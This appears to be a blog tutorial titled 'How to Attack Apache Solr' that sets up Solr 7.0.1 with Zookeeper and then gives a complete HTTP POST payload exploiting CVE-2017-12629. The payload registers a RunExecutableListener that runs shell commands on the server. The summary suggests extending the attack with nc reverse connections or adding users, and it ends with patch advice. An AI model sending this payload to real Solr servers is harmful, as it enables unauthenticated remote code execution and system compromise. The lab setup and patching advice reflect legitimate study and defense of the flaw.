How to Attack Apache Solr By Using CVE-2017-12629

Introduction

Apache Solr is highly reliable, scalable and fault tolerant, providing distributed indexing, replication and load-balanced querying, automated failover and recovery, centralized configuration and more. You can find more information by clicking this link.

This article shows that how to use CVE-2017-12629 to attack it.

Test Environment

Apache Solr Server: Ubuntu 16.04

Apache Solr: 7.0.1

Zookeeper: 3.4.6

Setup Test Environment

  • 1. Install Java8
sudo apt-get install python-software-properties
sudo apt-get install software-properties-common
sudo add-apt-repository ppa:webupd8team/java
sudo apt-get update
sudo apt-get install oracle-java8-installer
  • 2. Download Zookeeper 3.4.6
wget https://archive.apache.org/dist/zookeeper/zookeeper-3.4.6/zookeeper-3.4.6.tar.gz
  • 3. Setup & Start Zookeeper
tar zxvf zookeeper-3.4.6.tar.gz
cp zookeeper-3.4.6/conf/zoo_sample.cfg zookeeper-3.4.6/conf/zoo.cfg
sudo bin/zkServer.sh start

  • 4. Download Apache Solr 7.0.1
wget https://archive.apache.org/dist/lucene/solr/7.0.1/solr-7.0.1.zip
  • 5. Setup and Start Apache Solr
unzip solr-7.0.1.zip
cd solr-7.0.1
bin/solr start -z localhost:2181

How to Attack Apache Solr

  • Create a Collection

Create Collection

  • Using CVE-2017-12629 to attack

Using Burp Suit to submit the Payload, this payload will create a remote.sh on the “tmp” folder.

POST /solr/Test/config HTTP/1.1
Host: xx.xx.xx.xx:8983
Connection: close
Content-Type: application/json 
Content-Length: 338

{
   "update-listener": {
       "event": "postCommit",
       "name": "shell5",
       "class": "solr.RunExecutableListener",
       "exe": "sh",
       "dir": "/bin/",
       "args": ["-c", "touch /tmp/remote.sh; echo 'gnome-terminal -t \"remote shell\" -x bash -c \"sh/tmp/test.sh;exec bash;\"'> /tmp/remote.sh"]
    }
}

  • Update the Listener to trigger the malicious script

Please notice, we have to update the listener, otherwise, the malicious script will not be created.

Then, we can find that a malicious will be created on the server side. (remote.sh)

Summary

CVE-2017-12629 can be used to remote attack server. During the example attack, we already created a .sh file on the server. This means that we can create more dangerous Linux Script File. For example, we can use this to create a .sh file to run “nc” command to connect remote server or we can add a new user.

Due to parameters “exe”, “args” and “dir” can be crafted through the HTTP request during modification of the collection’s config. This means that anybody who can send a HTTP request to Solr API is able to execute arbitrary shell commands when “postCommit” event is fired. It leads to execution of arbitrary remote code for a remote attacker.

This security issue is Critical Level, and CVSS v3 Base Score is 9.8. I highly recommend to update to the software to the latest version. And do not use root user to run it.

There is another article about Apache Security Issue (CVE-2017-7659).

Reference

https://www.exploit-db.com/exploits/43009/
https://nvd.nist.gov/vuln/detail/CVE-2017-12629